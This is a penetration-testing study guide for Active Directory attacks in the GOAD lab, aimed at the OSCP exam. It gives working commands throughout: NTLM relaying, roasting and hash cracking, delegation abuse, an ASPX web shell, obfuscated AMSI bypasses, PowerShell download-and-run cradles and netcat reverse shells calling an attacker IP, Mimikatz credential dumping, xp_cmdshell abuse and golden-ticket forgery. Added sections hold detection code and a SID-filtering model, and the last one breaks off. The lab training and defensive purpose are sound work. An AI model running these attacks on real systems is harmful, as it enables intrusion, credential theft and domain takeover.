ad-in-goad-for-oscp-exam

This document is a comprehensive guide on penetration testing within Active Directory using the GOAD framework, detailing installation, enumeration, and various attack techniques such as NTLM relay and ASREPRoasting. It includes step-by-step instructions for setting up the environment, executing attacks, and extracting sensitive information from a Windows network. The author, Hernan Rodriguez, provides practical examples and commands for each method discussed.


AD-IN-GOAD - For OSCP exam

Informatique (Université d'Aix-Marseille)




PENETRATION TESTING
ACTIVE DIRECTORY IN
GOAD PART I

By Hernan Rodriguez

Senior Offensive Cybersecurity | Red Teamer | eCPTXv2 | CRTO | CRTP | CRTA | eCPPTv2 |
eWPTXv2 | eWPT | CAPen | MCRTA | CMPen | eMAPT | CNPen | eJPT | CEH-P | C)PTE |
OWASP | MITRE | OSINT | Splunk | ISO27K

https://www.linkedin.com/in/hernanrodriguez-/


Table of Contents
PENETRATION TESTING ACTIVE DIRECTORY IN GOAD PART I
INSTALLATION
ENUMERATION
  Authenticated SMB
  SMB NULL Session
NTLM RELAY
  RESPONDER AND NTLMRELAYX.PY (LOCAL ADMIN DUMPING LOCAL SAM HASHES)
  REVERSE TCP RESPONDER AND NTLMRELAYX.PY
  SOCKS NTLMRELAYX.PY (LOCAL ADMIN DUMPING LOCAL SAM HASHES)
ASREPROAST
KERBEROASTING
UNCONSTRAINED DELEGATION
CONSTRAINED DELEGATION
WEB SERVICES
EXPLOITING TRUST RELATIONSHIPS
  SID History Injection
  Kerberos Golden Ticket
ADCS (ACTIVE DIRECTORY CERTIFICATE SERVICES)


INSTALLATION

git clone https://github.com/Orange-Cyberdefense/GOAD.git
cd GOAD

python3 -m venv venvGOAD
source venvGOAD/bin/activate
sudo apt install vagrant
pip install ansible-core
python3 -m pip install ansible-core
python3 -m pip install pywinrm
cd ansible
ansible-galaxy install -r requirements.yml

Note: if there is little space on the main hard drive, change the path where VirtualBox stores the
virtual hard disks.

In the Vagrantfile we add the following two vb.customize lines inside the VirtualBox provider block
(the --hddfolder one is what moves the disk folder):

config.vm.provider "virtualbox" do |vb|
  vb.customize ["setextradata", :id, "VBoxInternal/Devices/VMMDev/0/Config/GetHostTimeDisabled", "1"]
  vb.customize ["modifyvm", :id, "--hddfolder", "/media/hernan/7EF2B0B94BF957E6/Virtualbox/"]
end

cd ..
check -l GOAD -p virtualbox -m local


./goad.sh -t install -l GOAD -p virtualbox -m local

We start the machines.

cd ad/GOAD/providers/virtualbox
vagrant up

We add the domain names to the hosts file: sudo nano /etc/hosts

We add the DNS server to the resolver configuration: sudo nano /etc/resolv.conf

We verify connectivity with the devices.


crackmapexec smb 192.168.56.1/24

If we want to turn off the machine we can use in ad/GOAD/providers/virtualbox


vagrant halt


ENUMERATION
In this scenario we are going to identify the services available on devices in the 192.168.56.0/24
range.
nmap -p- -sC -sV -oA full_goad 192.168.56.10-12,22-23 -Pn -vvv

We verify the devices are SMB enabled.


crackmapexec smb 192.168.56.1/24

Enumerating users using brute force


git clone https://github.com/ropnop/kerbrute.git
cd kerbrute
sudo make all
ls dist/
./kerbrute_linux_amd64
sudo cp kerbrute /usr/bin
kerbrute userenum -d north.sevenkingdoms.local --dc 192.168.56.11 usuarios.txt -o valid_users.txt


Authenticated SMB

We check which users have a description set (descriptions are a common place to find leaked credentials).

crackmapexec ldap 192.168.56.11-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M get-desc-users

We check whether the devices have ADCS (certificate services) deployed.

crackmapexec ldap 192.168.56.11-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M adcs

We check on which devices the user is allowed to authenticate, listing the domain groups.

crackmapexec smb 192.168.56.11-23 -u samwell.tarly -p 'Heartsbane' --groups


We check on which devices the user is allowed to authenticate, listing the local groups.

crackmapexec smb 192.168.56.11-23 -u samwell.tarly -p 'Heartsbane' --local-groups

We check, authenticated, the shared resources on the devices:

crackmapexec smb 192.168.56.11-23 -u samwell.tarly -p 'Heartsbane' --shares


Extract AD information
bloodhound-python -d north.sevenkingdoms.local -u samwell.tarly -p Heartsbane -dc winterfell.north.sevenkingdoms.local -ns 192.168.56.11 --zip -c All
bloodhound-python -d essos.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc meereen.essos.local -ns 192.168.56.12 --zip -c All
bloodhound-python -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local -ns 192.168.56.10 --zip -c All (DNS error, which is odd)
.\sharphound.exe -d sevenkingdoms.local -c all --zipfilename sevenkingdoms.zip


It helps a lot ;)
xfreerdp /v:192.168.56.11 /u:robb.stark /p:sexywolfy /size:80% /drive:tool,/tmp
wmic useraccount get domain,name,sid

SMB NULL Session


This is a vulnerability that allows an attacker to access shared resources on a Windows network without
authentication, which can result in unauthorized access, information gathering and remote code
execution. It should be disabled to prevent unwanted access.

Method 1

We verify access without authentication on the DC.


crackmapexec smb 192.168.56.1/24 --pass-pol

We check the password policy; at this stage we identify that, because of the policy, after 5 attempts
with an incorrect password the account is locked for 5 minutes.

We list the users available on the DC.


crackmapexec smb 192.168.56.1/24 --users


We identify this weakness in the domain north.sevenkingdoms.local.

Additionally, in the comments we identify the password of the user north.sevenkingdoms.local\samwell.tarly
(Password: Heartsbane).

Method 2

We connect anonymously through RPC.


rpcclient -U "" -N WINTERFELL
getdompwinfo
enumdomusers


queryuser 0x45f

We identify the user samwell.tarly and then query his record, finding credentials in the
description.

We list the groups

enumdomgroups


Filtering users with enum4linux


enum4linux -U 192.168.56.11 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

Other methods
https://github.com/ropnop/windapsearch
python3 windapsearch.py --dc-ip 192.168.56.11 -u "" -U
ldapsearch -H ldap://192.168.56.11 -x -b "DC=north,DC=sevenkingdoms,DC=local" -s sub "(objectclass=user)" | grep sAMAccountName: | cut -f2 -d" "

We check whether the user whose password we found in the profile description can authenticate on
the other devices (DCs) of the different domains.

crackmapexec smb 192.168.56.1/24 -u samwell.tarly -p 'Heartsbane'

We have access to the domains north.sevenkingdoms.local and essos.local on the following
devices: WINTERFELL, CASTELBLACK, BRAAVOS.

We extract the directory information of the domain from the "WINTERFELL" DC with bloodhound-python.

pip install bloodhound


bloodhound-python -u samwell.tarly -p 'Heartsbane' -ns 192.168.56.11 -d north.sevenkingdoms.local -c All

In which we identify 1 domain, 2 domains in the forest, 14 users, 51 groups, 3 GPOs, 19 containers,
1 trust, and the computers castelblack.north.sevenkingdoms.local and winterfell.north.sevenkingdoms.local.
We import the files into BloodHound.


NTLM RELAY
This is an attack technique that takes advantage of the NTLM (NT LAN Manager) authentication protocol
used in Windows network environments.

In this attack, an attacker intercepts a user's NTLM authentication and forwards it to a
remote server to gain unauthorized access to network resources.
This weakness allows attackers to gain improper access to sensitive systems and data on the
network.

responder -I vboxnet0

After a few minutes we obtain a Net-NTLMv2 hash for the user eddard.stark.
Password Cracking

Method 1
john --format=netntlmv2 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Method 2
hashcat -m 5600 --force -a 0 hash.txt /usr/share/wordlists/rockyou.txt


RESPONDER AND NTLMRELAYX.PY (LOCAL ADMIN DUMPING LOCAL SAM HASHES)
cme smb 192.168.56.10-23 --gen-relay-list relay.txt
sudo nano /usr/share/responder/Responder.conf (set SMB and HTTP to Off so Responder only poisons and ntlmrelayx receives the authentication)
sudo responder -I vboxnet0

impacket-ntlmrelayx -tf relay.txt -smb2support


REVERSE TCP RESPONDER AND NTLMRELAYX.PY

sudo responder -I vboxnet0


python3 -m http.server 8080
impacket-ntlmrelayx -tf relay.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://192.168.100.150:8080/rshell.ps1')"

rlwrap nc -lvp 4444

SOCKS NTLMRELAYX.PY (LOCAL ADMIN DUMPING LOCAL SAM HASHES)


sudo responder -I vboxnet0
sudo impacket-ntlmrelayx -tf relay.txt -of netntlm -smb2support -socks
sudo nano /etc/proxychains4.conf (socks5 127.0.0.1 1080)
proxychains4 impacket-secretsdump -no-pass 'NORTH'/'ROBB.STARK'@'192.168.56.22'

From this point we have impersonated the ROBB.STARK user through the SOCKS proxy, so we can use
proxychains to authenticate directly without a password.
proxychains4 impacket-secretsdump -no-pass 'NORTH'/'ROBB.STARK'@'192.168.56.22'


python3 -m pip install lsassy


proxychains4 lsassy --no-pass -d NORTH -u EDDARD.STARK -d NORTH /home/hernan/ip.txt

git clone https://github.com/login-securite/DonPAPI.git


cd DonPAPI
poetry update
poetry install
poetry run DonPAPI
proxychains4 -q poetry run DonPAPI -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'


Likewise, we can connect remotely to the RPC or SMB services to obtain a shell.


proxychains4 impacket-smbclient -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug

proxychains4 impacket-smbexec -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug


ASREPROAST
It is an attack that exploits a weakness in the Windows Kerberos protocol to obtain password material
for user accounts without knowing their passwords beforehand: for accounts with Kerberos
pre-authentication disabled, the KDC returns an AS-REP encrypted with the user's key to anyone who asks.

Once these AS-REP tickets are obtained, the attacker can attempt to recover the passwords of these accounts
using offline brute force methods.

Unauthenticated attack
impacket-GetNPUsers north.sevenkingdoms.local/ -usersfile valid_users.txt -request -dc-ip 192.168.56.11 -format john -outputfile outputfile.txt

Authenticated attack
impacket-GetNPUsers north.sevenkingdoms.local/samwell.tarly:Heartsbane -request -dc-ip 192.168.56.11 -format john -outputfile outputfile.txt


In both scenarios, the AS-REP hash is written to the file outputfile.txt.
We perform the password cracking with John the Ripper.

john --format:krb5asrep outputfile.txt --wordlist=/usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt

The password of user brandon.stark is iseedeadpeople.


KERBEROASTING

It is an attack on Active Directory environments that exploits weaknesses in the Microsoft Windows
Kerberos authentication protocol.

In this attack, an attacker can request service tickets for user accounts that have the authentication
service attribute disabled.

These tickets can be captured and later used to perform offline brute force attacks to crack the
passwords for these accounts.

This attack can compromise privileged user accounts and provide unauthorized access to systems
and resources on the network.

impacket-GetUserSPNs -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/samwell.tarly:Heartsbane -outputfile hash.kerberos

It is used to request the Service Principal Names (SPNs) associated with users on the domain
controller (DC), and we extract the Kerberos (TGS) hash.

Password Cracking
We perform the password cracking with hashcat.
hashcat -m 13100 hash.kerberos /usr/share/wordlists/rockyou.txt

We perform the password cracking with John the Ripper.
john --format=krb5tgs hash.kerberos --wordlist=/usr/share/wordlists/rockyou.txt


We verify which domain the user sansa.stark can authenticate on.


crackmapexec smb 192.168.56.10-23 -u sansa.stark -p iknownothing

Used to request a Ticket-Granting Ticket (TGT) for a specific user on a given domain.
impacket-getTGT north.sevenkingdoms.local/samwell.tarly:Heartsbane -dc-ip 192.168.56.11
export KRB5CCNAME=samwell.tarly.ccache
impacket-smbclient -k @winterfell.north.sevenkingdoms.local -dc-ip 192.168.56.11


Additional
If we are in a Windows RDP session or a reverse shell we can enumerate and exploit accounts
vulnerable to Kerberoasting.

The script performs a search in Active Directory to find all active user accounts, excluding the
krbtgt account and disabled accounts.

([adsisearcher]'(&(samAccountType=805306368)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))').FindAll()

./Rubeus.exe kerberoast /user:sql_svc


This command runs Rubeus, a security tool, with the "kerberoast" function, which is used to request
and steal service password hashes using the Kerberoasting attack. The user "sql_svc" is specified as
the target.
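Defensive counterpart to the ASREPROAST and KERBEROASTING sections above, as an added example that is not part of the original guide: a small detector run over constructed Windows Security events (4768 TGT requests and 4769 TGS requests). It flags TGT requests made without pre-authentication (what GetNPUsers produces) and one source asking for RC4 service tickets to several SPNs in a short window (what GetUserSPNs -request produces). The field names follow the event XML; the source address 192.168.56.1 and the svc_http/svc_backup accounts are constructed values.

```python
"""Detection sketch for AS-REP roasting and Kerberoasting over constructed events."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"        # 4769 TicketEncryptionType favoured by Kerberoasting
NO_PREAUTH = "0"         # 4768 PreAuthType 0 = no pre-authentication
WINDOW = timedelta(minutes=5)
SPN_THRESHOLD = 3        # distinct services per actor inside WINDOW


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def _is_user_account(name):
    """Machine accounts and krbtgt request/receive tickets routinely; skip them."""
    lowered = name.lower()
    return not lowered.endswith("$") and lowered != "krbtgt"


def detect_asrep_requests(events):
    """A 4768 with PreAuthType 0 for a user account is an AS-REP roastable request."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4768 or ev.get("PreAuthType") != NO_PREAUTH:
            continue
        if not _is_user_account(ev["TargetUserName"]):
            continue
        alerts.append({"rule": "asrep_roast", "user": ev["TargetUserName"],
                       "src": ev["IpAddress"], "time": ev["Time"]})
    return alerts


def detect_kerberoast(events):
    """One actor requesting RC4 service tickets for many SPNs within WINDOW."""
    by_actor = defaultdict(list)
    for ev in events:
        if ev.get("EventID") != 4769 or ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        service = ev["ServiceName"]
        if not _is_user_account(service):
            continue
        key = (ev["TargetUserName"], ev["IpAddress"])
        by_actor[key].append((_ts(ev["Time"]), service))

    alerts = []
    for (user, src), requests in by_actor.items():
        requests.sort()
        # sliding window: distinct services requested within WINDOW of each request
        for i, (start, _) in enumerate(requests):
            services = {svc for t, svc in requests[i:] if t - start <= WINDOW}
            if len(services) >= SPN_THRESHOLD:
                alerts.append({"rule": "kerberoast", "user": user, "src": src,
                               "services": sorted(services), "start": start})
                break
    return alerts


# Constructed sample: one AS-REP roastable request, one normal TGT request,
# a burst of RC4 TGS requests for three SPNs, and benign AES / krbtgt traffic.
SAMPLE_EVENTS = [
    {"EventID": 4768, "Time": "2024-01-01 09:58:00", "TargetUserName": "brandon.stark",
     "IpAddress": "192.168.56.1", "PreAuthType": "0"},
    {"EventID": 4768, "Time": "2024-01-01 09:58:05", "TargetUserName": "samwell.tarly",
     "IpAddress": "192.168.56.1", "PreAuthType": "2"},
    {"EventID": 4769, "Time": "2024-01-01 10:00:01", "TargetUserName": "samwell.tarly",
     "IpAddress": "192.168.56.1", "ServiceName": "sql_svc", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": "2024-01-01 10:00:02", "TargetUserName": "samwell.tarly",
     "IpAddress": "192.168.56.1", "ServiceName": "svc_http", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": "2024-01-01 10:00:03", "TargetUserName": "samwell.tarly",
     "IpAddress": "192.168.56.1", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": "2024-01-01 10:00:04", "TargetUserName": "jon.snow",
     "IpAddress": "192.168.56.22", "ServiceName": "CASTELBLACK$", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "Time": "2024-01-01 10:00:05", "TargetUserName": "jon.snow",
     "IpAddress": "192.168.56.22", "ServiceName": "krbtgt", "TicketEncryptionType": "0x17"},
]

if __name__ == "__main__":
    for alert in detect_asrep_requests(SAMPLE_EVENTS) + detect_kerberoast(SAMPLE_EVENTS):
        print(alert)
```

Tuning SPN_THRESHOLD and WINDOW against a baseline of the environment is what keeps this from firing on service accounts that legitimately hold several SPNs.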


UNCONSTRAINED DELEGATION
This is a setting that attackers can potentially use to impersonate a user or service account and gain
access to sensitive resources on an organization's network.

findDelegation.py NORTH.SEVENKINGDOMS.LOCAL/robb.stark:sexywolfy -dc-host WINTERFELL.north.sevenkingdoms.local

xfreerdp /v:192.168.56.11 /u:vagrant /p:vagrant /size:90% /drive:tool,/tmp

On the server we identify why the vulnerability occurs.


We connect remotely through WinRM.


evil-winrm -u robb.stark -p 'sexywolfy' -i 192.168.56.11
Bypass AMSI:
[ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -
f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -
f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -
eq 1))
IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.150/PowerView.ps1')
iwr http://192.168.100.150/Ghostpack-CompiledBinaries/Rubeus.exe -o Rubeus.exe
./Rubeus.exe triage

Get-ADUser robb.stark -Properties MemberOf

Set-MpPreference -EnableRealTimeMonitoring $true (we are members of the local Administrators group, so we disable Windows Defender)
./Rubeus.exe triage

We identify the available tickets.


python3 Coercer.py coerce -u robb.stark -d north.sevenkingdoms.local -p sexywolfy -t kingslanding.sevenkingdoms.local -l winterfell
We try to take advantage of this configuration to gain access to resources on the "winterfell" DC using
delegated credentials.

./Rubeus.exe triage

./Rubeus.exe dump /user:KINGSLANDING /service:krbtgt /nowrap

cat tgt.b64 | base64 -d > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/workspace/unconstrained/ticket.ccache


secretsdump.py -k -no-pass SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

evil-winrm -u administrator -H 'c66d72021a2d4744409969a581a1705e' -i SEVENKINGDOMS.LOCAL

We are domain administrators.


CONSTRAINED DELEGATION

In Active Directory it refers to situations where the credential delegation configuration is not
properly secured.
This could allow an attacker to compromise a service or server and use it to gain unauthorized
access to other resources within the network, unwantedly escalating their privileges.

MATCH p=(u)-[:AllowedToDelegate]->(c) RETURN p

findDelegation.py NORTH.SEVENKINGDOMS.LOCAL/jon.snow:iknownothing -dc-host WINTERFELL.north.sevenkingdoms.local

xfreerdp /v:192.168.56.11 /u:vagrant /p:vagrant /size:90% /drive:tool,/tmp

On the server we identify why the vulnerability occurs.


getST.py -spn 'CIFS/winterfell' -impersonate Administrator -dc-ip '192.168.56.11' 'north.sevenkingdoms.local/jon.snow:iknownothing'

export KRB5CCNAME=Administrator.ccache
wmiexec.py -k -no-pass 'north.sevenkingdoms.local/Administrator@winterfell'

secretsdump.py -k -no-pass 'north.sevenkingdoms.local/Administrator@winterfell'


WEB SERVICES
One of the initial vectors for a compromise of an Active Directory environment is the organization's
publicly exposed resources.

nmap -Pn -p- -sC -sV 192.168.56.22 -vvv

Ports found:
80/tcp
135/tcp
139/tcp
445/tcp
1433/tcp
3389/tcp
5985/tcp
5986/tcp
47001/tcp
49664/tcp
49665/tcp
49666/tcp
49670/tcp
49671/tcp
49672/tcp
49675/tcp
49676/tcp
50617/tcp


We identify a website that publicly allows file uploads; the server is IIS running ASPX/.NET.
http://192.168.56.22/Default.aspx

We upload an .aspx file containing the backdoor.

file: shell.aspx

<%@ Page Language="C#" Debug="false" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e)
{
string cmd = Request.QueryString["cmd"];
if (!string.IsNullOrEmpty(cmd))
{
string output = ExecuteCmd(cmd);
OutputResult(output);
}
}
protected string ExecuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c " + arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
using (Process p = Process.Start(psi))
{
using (StreamReader stmrdr = p.StandardOutput)
{
string result = stmrdr.ReadToEnd();
return result;
}
}
}
protected void OutputResult(string result)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(result));
Response.Write("</pre>");
}
</script>


If the file was uploaded correctly it is saved in the upload path, and we execute a command using the
GET parameter cmd.

http://192.168.56.22/upload/shell.aspx?cmd=whoami

We set up a web server hosting our PowerShell reverse shell.

https://github.com/HernanRodriguez1/RevershellTCP_BypassAMSI
wget https://raw.githubusercontent.com/HernanRodriguez1/RevershellTCP_BypassAMSI/main/rshell.ps1
We edit the rshell.ps1 file and add our IP and listening port.
$servidor = new-object System.Net.Sockets.TcpClient('192.168.100.150',443);
python3 -m http.server 80
nc -lvp 443
We start the nc server with interactive shell
rlwrap nc -lvp 443
We enter the payload in the vulnerable parameter of the affected server.
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.150/rshell.ps1')"
http://192.168.56.22/upload/shell.aspx?cmd=powershell.exe%20-exec%20Bypass%20-noexit%20-C%20%22IEX%20(New-Object%20Net.WebClient).DownloadString(%27http://192.168.100.150/rshell.ps1%27)%22

We have our C2 on the castelblack host


Privilege Escalation

whoami /priv

We have the SeImpersonatePrivilege privilege enabled.

We are going to impersonate the SYSTEM user with PrintSpoofer.


cd C:\tmp
iwr http://192.168.100.150/nc.exe -O nc.exe
./nc.exe 192.168.100.150 445 -e powershell.exe

iwr http://192.168.100.150/PrintSpoofer.exe -O PrintSpoofer.exe


./PrintSpoofer.exe -i -c cmd.exe


Dump LSASS with Mimikatz

cd C:\tmp
iwr http://192.168.100.150/mimikatz.exe -O mimikatz.exe
mimikatz.exe
privilege::debug
lsadump::sam /domain:north.sevenkingdoms.local /all /csv

user: Administrator
hash: dbd13e1c4e338284ac4e9874f7de6ef4

crackmapexec winrm 192.168.56.22 -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' -d castelblack

evil-winrm -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' -i 192.168.56.22


whoami ; hostname

whoami /groups

We identify that the user is a Domain Administrator in NORTH.


sekurlsa::logonpasswords

user: robb.stark
pass: 831486ac7f26860c9e2f51ac91e1a07a

We verify which group the user robb.stark is in

We identify which devices the robb.stark user can connect to by executing commands.

crackmapexec smb 192.168.56.1/24 -u robb.stark -H '831486ac7f26860c9e2f51ac91e1a07a' -X "whoami"


Linked Database Servers

The Linked Database Servers vulnerability occurs when database servers are insecurely
interconnected, allowing a vulnerability in one to compromise the security of the others.

We identify the hosts that allow authentication through MSSQL.


crackmapexec mssql 192.168.56.1/24 -u jon.snow -H 'b8d76e56e9dac90539aff05e3ccb1755'

We identify the user jon.snow and connect with the impacket module mssqlclient.py.

/usr/share/doc/python3-impacket/examples/mssqlclient.py jon.snow@192.168.56.22 -hashes ':b8d76e56e9dac90539aff05e3ccb1755' -windows-auth
We identify the linked services.
enum_links

We have the BRAAVOS service, which is in the domain essos.local


We perform a forced-authentication attack with smbserver and the xp_dirtree stored procedure, making the
remote server braavos.essos.local connect to our SMB server so that we capture its hash.

impacket-smbserver share . -smb2support


select * from openquery("BRAAVOS", 'SELECT 1; EXEC master..xp_dirtree ''\\192.168.100.150\share\''')


In this scenario we capture the hash of the sql_svc user.


We enable xp_cmdshell on the remote BRAAVOS machine.

EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [BRAAVOS]
EXEC ('EXEC xp_cmdshell ''whoami''') AT [BRAAVOS]

We identify the permissions of the sql_svc user.


EXEC ('EXEC xp_cmdshell ''whoami /priv''') AT [BRAAVOS]

We identify the SeImpersonatePrivilege privilege, which allows us to impersonate the
NT AUTHORITY\SYSTEM account from that user.
To do this, first I am going to download ncat.exe and PrintSpoofer.exe (loader.exe).

EXEC ('EXEC xp_cmdshell ''powershell.exe copy \\192.168.100.150\\share\\Nct.exe c:\tmp\Nct.exe''') AT [BRAAVOS]
EXEC ('EXEC xp_cmdshell ''powershell.exe copy \\192.168.100.150\\share\\Loader.exe c:\tmp\Loader.exe''') AT [BRAAVOS]
rlwrap nc -lvp 443
EXEC ('EXEC xp_cmdshell ''c:\tmp\Loader.exe -c "c:\tmp\ncat.exe 192.168.100.150 443 -e cmd.exe"''') AT [BRAAVOS]

We have access as a system user NT AUTHORITY\SYSTEM.


EXPLOITING TRUST RELATIONSHIPS

Exploiting trust relationships involves leveraging connections between systems to compromise the
security of a network, allowing attackers to move laterally and gain access to sensitive resources.

SID History Injection

The focus of the SID History Injection Attack is to facilitate the migration of users between
domains by ensuring continued access to resources from the previous domain. This is achieved by
incorporating the user's previous Security Identifier (SID) into the SID History of their new
account. Importantly, this process can be manipulated to grant unauthorized access by adding the
SID of a high-privilege group (such as Enterprise Administrators or Domain Administrators) of the
primary domain to the SID History. This exploit grants access to all resources within the parent
domain.

evil-winrm -u robb.stark -p 'sexywolfy' -i 192.168.56.11


Bypass AMSI:
[ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -
f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -
f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -
eq 1))
IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.150/PowerView.ps1')

Get-ADTrust -Filter *
Used to list the trusts established in an Active Directory environment.


Get-ADForest
It is used to collect information about the Active Directory forest such as forest name, domain root,
domain controllers, replication settings, functionality modes, and more.

Get-DomainTrust -Filter *
Used to enumerate and display information about the trust relationships established between
domains in an Active Directory environment.

SourceName : north.sevenkingdoms.local
TargetName : sevenkingdoms.local

Get-DomainSID -Domain north.sevenkingdoms.local
Gets the DomainSID of the domain.
S-1-5-21-1783999085-2058125239-2142067885

Get-DomainSID -Domain sevenkingdoms.local
DomainSID of the parent domain.
Unknown error.

IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.150/ADMap.ps1')
DomainSID of the parent domain.
Unknown error.


IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.150/ADMap.ps1')
DomainSID of the parent domain.
S-1-5-21-656936499-3686200758-3068599609

impacket-secretsdump allows us to obtain clear-text passwords, password hashes and other sensitive data
stored in the SAM (Security Account Manager) database and in NTDS.dit (the Active Directory database).

impacket-secretsdump 'north/robb.stark:sexywolfy@192.168.56.11'

krbtgt nt_hash: 3f669715abb8fb5cada5f208d458e218
krbtgt aes256: 2718ee194cdce1bbeebb9f20cf5af8b4156b1465451bc4a7bd5c6ad281261da5


We check whether we have access.


dir \\KINGSLANDING.sevenkingdoms.local\C$

We do not have access.


.\mimi64.exe
token::elevate
privilege::debug
kerberos::golden /user:Administrator /domain:north.sevenkingdoms.local /sid:S-1-5-21-1783999085-2058125239-2142067885 /sids:S-1-5-21-656936499-3686200758-3068599609-519 /aes256:2718ee194cdce1bbeebb9f20cf5af8b4156b1465451bc4a7bd5c6ad281261da5 /startoffset:-5 /endin:600 /renew:10080 /ptt

kerberos::golden: Indicates that a Golden Ticket attack is being performed using Kerberos
functionality.
/user:Administrator: Specifies the username for which the Kerberos ticket is to be generated. In this
case, a ticket is being generated for the "Administrator" user.
/domain:north.sevenkingdoms.local: Specifies the domain for which the Kerberos ticket is to be
generated. Here, the domain "north.sevenkingdoms.local" is indicated.
/sid:S-1-5-21-1783999085-2058125239-2142067885: Provides the security identifier (SID) of the
domain. Each domain has a unique SID and this information is used in generating the Kerberos
ticket.
/sids:S-1-5-21-656936499-3686200758-3068599609-519: Specifies the additional SIDs to include in the
Kerberos ticket's SID history. Here it is the SID of the parent domain sevenkingdoms.local with
RID 519, that is, its Enterprise Admins group.
/aes256:2718ee194cdce1bbeebb9f20cf5af8b4156b1465451bc4a7bd5c6ad281261da5: Provides the
AES256 key used to encrypt the Kerberos ticket. This key is necessary to generate a valid and
authenticated ticket.
/startoffset:-5: Specifies the start time in minutes for the Kerberos ticket. In this case, a start is set
five minutes in the past.
/endin:600: Indicates the duration of the Kerberos ticket in minutes. Here, it is established that the
ticket will be valid for the next 600 minutes (10 hours).
/renew:10080: Specifies the Kerberos ticket renewal time in minutes. In this case, it is established
that the ticket can be renewed every 10,080 minutes (one week).
/ptt: Indicates that the generated Kerberos ticket will be injected directly into the system for use.
This parameter allows the attacker to authenticate and access resources using the forged ticket.
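The mitigation for the SID History Injection described above is SID filtering on the trust. As an added example that is not part of the original guide, the code below models the check a domain controller applies to the extra SIDs carried in a ticket that arrives over a trust, using the two domain SIDs from this page (north child domain and sevenkingdoms parent, RID 519 being Enterprise Admins). The `quarantine` flag models SID filtering enabled versus the default for a parent/child trust inside one forest, where foreign SIDs pass through; the RID 1105 used for a legitimate SID is a constructed value.

```python
"""SID filtering model for extra SIDs (SID history) in cross-domain tickets."""
import re

NORTH_SID = "S-1-5-21-1783999085-2058125239-2142067885"     # child domain (from the page)
PARENT_SID = "S-1-5-21-656936499-3686200758-3068599609"     # forest root (from the page)
ENTERPRISE_ADMINS_RID = 519

# S-1-5-21-<a>-<b>-<c> optionally followed by -<rid>
DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)(?:-(\d+))?$")


def split_sid(sid):
    """Return (domain_sid, rid) for an S-1-5-21 SID; rid is None for a bare domain SID."""
    match = DOMAIN_SID_RE.match(sid)
    if not match:
        raise ValueError(f"not a domain SID: {sid}")
    rid = int(match.group(2)) if match.group(2) is not None else None
    return match.group(1), rid


def filter_extra_sids(trusted_domain_sid, extra_sids, quarantine):
    """Apply SID filtering to the ExtraSids of a ticket issued by trusted_domain_sid.

    quarantine=True: only SIDs that belong to the trusted domain survive, so an
    injected SID from another domain (the attack on this page) is dropped.
    quarantine=False: intra-forest default, every SID passes through.
    Returns (accepted, rejected).
    """
    accepted, rejected = [], []
    for sid in extra_sids:
        domain, _rid = split_sid(sid)
        if quarantine and domain != trusted_domain_sid:
            rejected.append(sid)
        else:
            accepted.append(sid)
    return accepted, rejected


def grants_enterprise_admin(accepted_sids, forest_root_sid):
    """True if the surviving SIDs include the forest root's Enterprise Admins group."""
    return f"{forest_root_sid}-{ENTERPRISE_ADMINS_RID}" in accepted_sids


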